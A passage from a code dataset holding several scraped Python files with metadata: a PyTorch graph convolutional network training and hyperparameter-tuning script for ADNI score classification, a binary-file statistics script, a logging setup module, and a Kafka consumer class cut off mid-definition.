in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(in_dim, out_dim, bias=False)\n \n def forward(self, in_x, out_x):\n if (self.in_dim != self.out_dim): # dimension이 다르면 dimension을 맞춰주는 작업\n in_x = self.linear(in_x)\n out = in_x + out_x\n return out\n \nclass GatedSkipConnection(nn.Module):\n \n def __init__(self, in_dim, out_dim):\n super(GatedSkipConnection, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(in_dim, out_dim, bias=False)\n self.linear_coef_in = nn.Linear(out_dim, out_dim)\n self.linear_coef_out = nn.Linear(out_dim, out_dim)\n self.sigmoid = nn.Sigmoid()\n \n def forward(self, in_x, out_x):\n if (self.in_dim != self.out_dim):\n in_x = self.linear(in_x)\n z = self.gate_coefficient(in_x, out_x)\n out = torch.mul(z, out_x) + torch.mul(1.0 - z, in_x)\n return out\n \n def gate_coefficient(self, in_x, out_x):\n x1 = self.linear_coef_in(in_x)\n x2 = self.linear_coef_out(out_x)\n return self.sigmoid(x1+x2)\n \nclass Attention(nn.Module):\n \n def __init__(self, 
in_dim, output_dim, num_head):\n super(Attention, self).__init__()\n \n self.num_head = num_head\n self.atn_dim = output_dim // num_head\n \n self.linears = nn.ModuleList()\n self.corelations = nn.ParameterList()\n for i in range(self.num_head):\n self.linears.append(nn.Linear(in_dim, self.atn_dim))\n corelation = torch.FloatTensor(self.atn_dim, self.atn_dim)\n nn.init.xavier_uniform_(corelation)\n self.corelations.append(nn.Parameter(corelation))\n \n self.tanh = nn.Tanh()\n \n def forward(self, x, adj):\n heads = list()\n for i in range(self.num_head):\n x_transformed = self.linears[i](x)\n alpha = self.attention_matrix(x_transformed, self.corelations[i], adj)\n x_head = torch.matmul(alpha, x_transformed)\n heads.append(x_head)\n output = torch.cat(heads, dim=2)\n return output\n \n def attention_matrix(self, x_transformed, corelation, adj):\n x = torch.einsum('akj, ij->aki', (x_transformed, corelation))\n alpha = torch.matmul(x, torch.transpose(x_transformed, 1, 2))\n alpha = torch.mul(alpha, adj)\n alpha = self.tanh(alpha)\n return alpha\n \nclass GCNLayer(nn.Module):\n \n def __init__(self, in_dim, out_dim, n_node, act=None, bn=False, atn=False, num_head=1, dropout=0):\n super(GCNLayer, self).__init__()\n \n self.use_bn = bn\n self.use_atn = atn\n self.linear = nn.Linear(in_dim, out_dim)\n nn.init.xavier_uniform_(self.linear.weight)\n self.bn = nn.BatchNorm1d(n_node)\n self.attention = Attention(out_dim, out_dim, num_head)\n self.activation = act\n self.dropout_rate = dropout\n self.dropout = nn.Dropout2d(self.dropout_rate)\n \n def forward(self, x, adj):\n out = self.linear(x)\n if self.use_atn:\n out = self.attention(out, adj)\n else:\n out = torch.matmul(adj, out)\n if self.use_bn:\n out = self.bn(out)\n if self.activation != None:\n out = self.activation(out)\n if self.dropout_rate > 0:\n out = self.dropout(out)\n return out, adj\n \nclass GCNBlock(nn.Module):\n def __init__(self, n_layer, in_dim, hidden_dim, out_dim, n_node, bn=True, atn=True, num_head=1, sc='gsc', dropout=0):\n super(GCNBlock, self).__init__()\n \n self.layers = nn.ModuleList()\n for i in range(n_layer):\n self.layers.append(GCNLayer(in_dim if i==0 else hidden_dim,\n out_dim if i==n_layer-1 else hidden_dim,\n n_node,\n nn.ReLU() if i != n_layer-1 else None,\n bn,\n atn,\n num_head,\n dropout))\n \n self.relu = nn.ReLU()\n if sc=='gsc':\n self.sc = GatedSkipConnection(in_dim, out_dim)\n elif sc =='sc':\n self.sc = SkipConnection(in_dim, out_dim)\n elif sc=='no':\n self.sc = None\n else:\n assert False, \"Wrong sc type.\"\n \n def forward(self, x, adj):\n residual = x\n for i, layer in enumerate(self.layers):\n out, adj = layer((x if i==0 else out), adj)\n if self.sc != None:\n out = self.sc(residual, out)\n out = self.relu(out)\n return out, adj\n \nclass ReadOut(nn.Module):\n \n def __init__(self, in_dim, out_dim, act=None):\n super(ReadOut, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(self.in_dim,\n self.out_dim)\n nn.init.xavier_uniform_(self.linear.weight) # activation function 따라 다른 방식의 initialization을 쓸 수 있음.\n self.activation = act\n \n def forward(self, x):\n out = self.linear(x)\n out = torch.sum(out, 1)\n if self.activation != None:\n out = self.activation(out)\n return out\n \nclass Predictor(nn.Module):\n \n def __init__(self, in_dim, out_dim, act=None):\n super(Predictor, self).__init__()\n \n self.in_dim = in_dim\n self.out_dim = out_dim\n \n self.linear = nn.Linear(self.in_dim,\n self.out_dim)\n nn.init.xavier_uniform_(self.linear.weight)\n 
self.activation = act\n \n def forward(self, x):\n out = self.linear(x)\n if self.activation != None:\n out = self.activation(out)\n return out\n \n\n# 2-3 Model \nclass GCNNet(nn.Module):\n def __init__(self, args):\n super(GCNNet, self).__init__()\n \n self.blocks = nn.ModuleList()\n for i in range(args.n_block):\n self.blocks.append(GCNBlock(args.n_layer,\n args.in_dim if i==0 else args.hidden_dim,\n args.hidden_dim,\n args.hidden_dim,\n args.n_node,\n args.bn,\n args.atn,\n args.num_head,\n args.sc,\n args.dropout\n ))\n self.readout = ReadOut(args.hidden_dim,\n args.pred_dim1,\n act=nn.ReLU())\n self.pred1 = Predictor(args.pred_dim1,\n args.pred_dim2,\n act=nn.ReLU())\n self.pred2 = Predictor(args.pred_dim2,\n args.pred_dim3,\n act=nn.Tanh())\n self.pred3 = Predictor(args.pred_dim3,\n args.out_dim)\n \n def forward(self, x, adj):\n for i, block in enumerate(self.blocks):\n out, adj = block((x if i==0 else out), adj)\n out = self.readout(out)\n out = self.pred1(out)\n out = self.pred2(out)\n out = self.pred3(out)\n \n return out #3개짜리 내보냄\n\n \n################################################## STEP 3. utils for train, valid, test ################################################\n \ndef multi_acc(y_pred, y_test):\n y_pred = torch.Tensor(y_pred)\n y_test = torch.Tensor(y_test) \n #print('y_test:', y_test) #0, 1, 2로 되어있음!\n y_pred_softmax = torch.log_softmax(y_pred, dim=0)\n #print('y_pred_softmax:', y_pred_softmax)\n _, y_pred_tags = torch.max(y_pred_softmax, dim=0)\n #print('y_pred_tags:', y_pred_tags) # 여기서 0, 1, 2가 나와야 함..ㅎㅎ..\n \n correct_pred = (y_pred_tags == y_test).float()\n acc = correct_pred.sum() / len(correct_pred)\n \n acc = torch.round(acc * 100)\n \n return acc\n\ndef train(model, device, optimizer, criterion, data_train, bar, args):\n epoch_train_loss = 0\n for i, batch in enumerate(data_train):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n list_NIH_score = list_NIH_score.view(-1, 1)\n list_NIH_score = list_NIH_score.type(torch.long)\n #print('shape of list_NIH_score is:', list_NIH_score.shape)\n #print('list_NIH_score is:', list_NIH_score)\n \n model.train()\n optimizer.zero_grad()\n list_pred_NIH_score = model(list_feature, list_adj)\n #print('shape of list_pred_NIH_score is:', list_pred_NIH_score.shape)\n\n list_pred_NIH_score.require_grad = False\n train_loss = criterion(list_pred_NIH_score, list_NIH_score.squeeze(dim=-1))\n #print('train loss is:', train_loss)\n epoch_train_loss += train_loss.item()\n train_loss.backward()\n optimizer.step()\n \n bar.update(len(list_feature))\n \n epoch_train_loss /= len(data_train)\n \n return model, epoch_train_loss\n\ndef validate(model, device, criterion, data_val, bar, args):\n epoch_val_loss = 0\n with torch.no_grad():\n for i, batch in enumerate(data_val):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... 
torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n list_NIH_score = list_NIH_score.view(-1,1)\n list_NIH_score = list_NIH_score.type(torch.long)\n\n model.eval()\n list_pred_NIH_score = model(list_feature, list_adj)\n list_pred_NIH_score.require_grad = False\n val_loss = criterion(list_pred_NIH_score, list_NIH_score.squeeze(dim=-1))\n epoch_val_loss += val_loss.item()\n \n bar.update(len(list_feature))\n\n epoch_val_loss /= len(data_val)\n \n return model, epoch_val_loss\n\ndef test(model, device, data_test, args):\n model.eval()\n with torch.no_grad():\n NIH_score_total = list()\n pred_NIH_score_total = list()\n for i, batch in enumerate(data_test):\n list_feature = batch[0].clone().to(device).float().detach().requires_grad_(True)\n list_adj = batch[1].clone().to(device).float().detach().requires_grad_(True)\n #원형은... torch.tensor(batch[1]).to(device).float()\n list_NIH_score = batch[2].clone().to(device).float().detach().requires_grad_(True)\n NIH_score_total += list_NIH_score.tolist()\n list_NIH_score = list_NIH_score.view(-1,1)\n list_NIH_score = list_NIH_score.type(torch.long)\n\n list_pred_NIH_score = model(list_feature, list_adj)\n pred_NIH_score_total += list_pred_NIH_score.view(-1).tolist()\n\n #print('true label: ', NIH_score_total)\n #print('pred label: ', pred_NIH_score_total)\n acc = multi_acc(pred_NIH_score_total, NIH_score_total) ## 여기를 어떻게 바꿀까?\n #std = np.std(np.array(NIH_score_total)-np.array(pred_NIH_score_total))\n\n return acc, NIH_score_total, pred_NIH_score_total\n\ndef experiment(dict_partition, device, bar, args):\n time_start = time.time()\n \n model = GCNNet(args)\n model.to(device)\n\n \n if args.optim == 'Adam':\n optimizer = optim.Adam(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n elif args.optim == 'RMSprop':\n optimizer = optim.RMSprop(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n elif args.optim == 'SGD':\n optimizer = optim.SGD(model.parameters(),\n lr=args.lr,\n weight_decay=args.l2_coef)\n else:\n assert False, 'Undefined Optimizer Type'\n \n criterion = nn.CrossEntropyLoss().to(device)\n #criterion = nn.L1Loss(reduction = 'sum')\n scheduler = optim.lr_scheduler.StepLR(optimizer,\n step_size=args.step_size,\n gamma=args.gamma)\n\n list_train_loss = list()\n list_val_loss = list()\n\n data_train = DataLoader(dict_partition['train'], \n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n data_val = DataLoader(dict_partition['val'],\n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n for epoch in range(args.epoch):\n\n #scheduler.step() - 순서 변경! 
optimizer 다음에 오도록.\n model, train_loss = train(model, device, optimizer, criterion, data_train, bar, args)\n scheduler.step()\n list_train_loss.append(train_loss)\n model, val_loss = validate(model, device, criterion, data_val, bar, args)\n list_val_loss.append(val_loss)\n\n data_test = DataLoader(dict_partition['test'],\n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n acc, NIH_score_total, pred_NIH_score_total = test(model, device, data_test, args) #원래 acc 가 앞에 있었음.\n \n time_end = time.time()\n time_required = time_end - time_start\n \n args.list_train_loss = list_train_loss\n args.list_val_loss = list_val_loss\n args.NIH_score_total = NIH_score_total\n args.pred_NIH_score_total = pred_NIH_score_total\n args.acc = acc\n args.time_required = time_required\n \n return args\n\ndict_partition = partition(list_feature, list_adj, list_NIH_score, args)\n\n################################################## STEP 4. hyperparameter tuning ################################################\n\n# 4-1. hyperparameter list\nargs.batch_size = 128\nargs.lr = 0.001\nargs.l2_coef = 0\nargs.optim = 'Adam'\nargs.epoch = 30\nargs.n_block = 2\nargs.n_layer = 2\nargs.n_node = 84\nargs.in_dim = 2 #number of node feature\nargs.hidden_dim = 32\nargs.pred_dim1 = 32\nargs.pred_dim2 = 32\nargs.pred_dim3 = 32\nargs.out_dim = 3 #이거 맞아..\nargs.bn = True\nargs.sc = 'no'\nargs.atn = False\nargs.step_size = 10\nargs.gamma = 0.1\nargs.dropout = 0\nargs.num_head = 8\n\n# 4-2. set device\ndevice = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu') #여기 바꿔가면서 실험해야 함\n\n# 4-3. hyperparameter space\nlist_lr = [0.01, 0.001] #, 0.0001, 0.00001]\nlist_n_block = [1, 2] #, 3]\nlist_n_layer = [1, 2] #, 3]\nlist_bn = [False, True]\nlist_sc = ['no', 'sc', 'gsc']\nlist_atn = [False, True]\nlist_hidden_dim = [32, 64] #, 256, 512]\nlist_num_head = [2, 4] #, 8] #, 16]\nlist_pred_dim1 = [32, 64] #, 256]\nlist_pred_dim2 = [32, 64] #, 256]\nlist_pred_dim3 = [32, 64] #, 256]\n\nvar1 = \"lr\"\nvar2 = \"n_block\"\nvar3 = \"n_layer\"\nvar4 = \"bn\"\nvar5 = \"sc\"\nvar6 = \"atn\"\nvar7 = \"hidden_dim\"\nvar8 = \"num_head\"\nvar9 = \"pred_dim1\"\nvar10 = \"pred_dim2\"\nvar11 = \"pred_dim3\"\n\nall_ = [list_lr, list_n_block, list_n_layer, list_bn, list_sc, list_atn, list_hidden_dim, list_num_head,\n list_pred_dim1, list_pred_dim2, list_pred_dim3] \nh_space = [s for s in itertools.product(*all_)]\n\n# 4-4. 
run!\ndict_result = dict()\nn_iter = 3072*args.epoch*(len(dict_partition['train'])+len(dict_partition['val']))\nbar = tqdm(total=n_iter, file=sys.stdout, position=0)\n\nfor hy in h_space:\n args.lr = hy[0]\n args.n_block = hy[1]\n args.n_layer = hy[2]\n args.bn = hy[3]\n args.sc = hy[4]\n args.atn = hy[5]\n args.hidden_dim = hy[6]\n args.num_head = hy[7]\n args.pred_dim1 = hy[8]\n args.pred_dim2 = hy[9]\n args.pred_dim3 = hy[10]\n exp_name = var1+':'+str(hy[0])+'/'+var2+':'+str(hy[1])+'/'+var3+':'+str(hy[2])+'/'+var4+':'+str(hy[3])+'/'+var5+':'+str(hy[4])+'/'+var6+':'+str(hy[5])+'/'+var7+':'+str(hy[6])+'/'+var8+':'+str(hy[7])+'/'+var9+':'+str(hy[8])+'/'+var10+':'+str(hy[9])+'/'+var11+':'+str(hy[10])\n args.exp_name = exp_name\n result = vars(experiment(dict_partition, device, bar, args))\n print(args.exp_name + \" took \" + str(int(args.time_required)) + \"seconds.\")\n dict_result[args.exp_name] = copy.deepcopy(result)\n \n torch.cuda.empty_cache()\nbar.close()\n\n# 4-5 save exeperiment result\ndf_result = pd.DataFrame(dict_result).transpose()\ndf_result.to_csv('./GCN_result/GCN_hyp_tuning_ADNI_minmax_scaled_label+feature.csv')", "repo_name": "Sangyoon-Bae/PGM_2022_ADNI_PLL", "sub_path": "GCN/multiclass_classification_GCN_acc_minmaxscaler_for_feature.py", "file_name": "multiclass_classification_GCN_acc_minmaxscaler_for_feature.py", "file_ext": "py", "file_size_in_byte": 26440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 3, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "scipy.io.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.random.default_rng", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 236, "usage_type": "call"}, 
{"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 253, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.mul", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 269, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 269, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 283, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 283, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 285, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 285, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 294, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 304, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 304, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 311, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 312, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 317, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 333, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 333, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", 
"line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 342, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 342, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 348, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 375, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 382, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 387, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 387, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 395, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 395, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 397, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 397, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 408, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 408, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 412, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 412, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 427, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 430, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 430, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 433, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 433, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 451, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 452, "usage_type": "call"}, {"api_name": "torch.log_softmax", "line_number": 454, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 456, "usage_type": "call"}, {"api_name": "torch.round", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 474, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 505, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 521, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 531, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 544, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 551, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 551, "usage_type": "name"}, {"api_name": "torch.optim.RMSprop", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 555, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 559, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 559, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 565, "usage_type": 
"call"}, {"api_name": "torch.nn", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 567, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 567, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 574, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 578, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 591, "usage_type": "call"}, {"api_name": "time.time", "line_number": 597, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 637, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 637, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 637, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 666, "usage_type": "call"}, {"api_name": "tqdm.notebook.tqdm", "line_number": 671, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 671, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 689, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 691, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 695, "usage_type": "call"}]}
+{"seq_id": "18233678707", "text": "import datetime\nimport time\n\nmin_int = 2 ** 31\nmax_int = 0\nsum_int = 0\n\nstart_time = time.time()\n\nwith open('file.bin', 'rb') as f:\n\n for i in range(2 ** 9):\n b = f.read(2 ** 22)\n bb = bytearray(b)\n\n for j in range(2 ** 20):\n a = int.from_bytes(bb[4*j:4*j+4], byteorder='big', signed=False)\n if a > max_int:\n max_int = a\n if a < min_int:\n min_int = a\n sum_int += a\n\n b = f.read(2 ** 22)\n\n print(i)\n print('min: ', min_int)\n print('max: ', max_int)\n print('sum: ', sum_int)\n\nprint('min: ', min_int)\nprint('max: ', max_int)\nprint('sum: ', sum_int)\n\nend_time = time.time()\n\nuptime = end_time - start_time\n\nhuman_uptime = str(datetime.timedelta(seconds=int(uptime)))\n\nprint(human_uptime)\n", "repo_name": "koshreality/2gbfile", "sub_path": "read1.py", "file_name": "read1.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "time.time", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "22786439329", "text": "import logging\nimport logging.handlers\nimport time\n\n######### DEBUG LEVELS ##########\nCONSOLE_LEVEL = logging.DEBUG\nFILE_LEVEL = logging.INFO\n#################################\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nformatter.converter = time.gmtime\n\n# Log to console\nch = logging.StreamHandler()\nch.setLevel(CONSOLE_LEVEL)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# Log to file\nfh = logging.handlers.RotatingFileHandler(\n 'emailchecker.log', maxBytes=1024*2, backupCount=1)\nfh.setLevel(FILE_LEVEL)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n", "repo_name": "mrdavidoneill/poweroutcasa", "sub_path": "app/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.DEBUG", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "36274169078", "text": "\"\"\"Kafka consumer.\"\"\"\nimport json\nfrom typing import Any, Dict, List, Union\n\nfrom confluent_kafka import Consumer, KafkaError, Message\n\nfrom ..custom_logging import get_logger\nfrom ..pub_sub import Publisher, Subscriber\n\n\nclass KafkaConsumer(Publisher):\n \"\"\"\n Consumer for Kafka, which publishes to all subscribed clients.\n \"\"\"\n\n def __init__(self, bootstrap_servers: str, group_id: str):\n \"\"\"\n Kafka consumer class which implements also the Publisher interface.\n Messages consumed from Kafka should be strings representing valid\n JSON objects.\n\n Parameters\n ----------\n bootstrap_servers: list of str\n addresses of the Kafka servers\n\n group_id: str\n consumer group id\n \"\"\"\n self.__logger = get_logger('consumer-{}'.format(group_id))\n self.subscribers: Dict[str, Subscriber] = dict()\n self.running = False\n\n config = {\n 'bootstrap.servers': bootstrap_servers,\n 'group.id': group_id,\n 'enable.auto.commit': True,\n 'default.topic.config': {\n 'auto.offset.reset': 'smallest'\n },\n }\n self.kafka = Consumer(config)\n\n def kafka_subscribe(self, topic: Union[str, List[str]]):\n if isinstance(topic, list):\n self.kafka.subscribe(topic)\n elif isinstance(topic, str):\n self.kafka.subscribe([topic])\n\n def start_consuming(self):\n \"\"\"\n Start consuming messages from Kafka.\n Every consumed message is then passed to all subscribers.\n \"\"\"\n try:\n self.running = True\n while self.running:\n messages = self.kafka.consume(10, timeout=1.0)\n\n if messages: # consumed some messages from Kafka\n valid_messages = []\n # check every message, if ok send to Subscriber, else log error\n for message in messages:\n err = message.error()\n if err: # error receiving this message\n if err.code() != KafkaError._PARTITION_EOF:\n self.__logger.error(\"Kafka error {}\".format(\n message.error().str()))\n else:\n valid_messages.append(message)\n\n self.__logger.info(\"Valid messages: {}\".format(\n len(valid_messages)))\n for message in valid_messages:\n self.publish(message)\n except (KeyboardInterrupt, SystemExit):\n self.on_shutdown()\n\n def add_subscriber(self, sub_obj, sub_name):\n \"\"\"\n Add subscriber.\n\n Parameters\n ----------\n sub_obj: Subscriber\n the subscriber object\n\n sub_name: str\n name of the subscriber. 
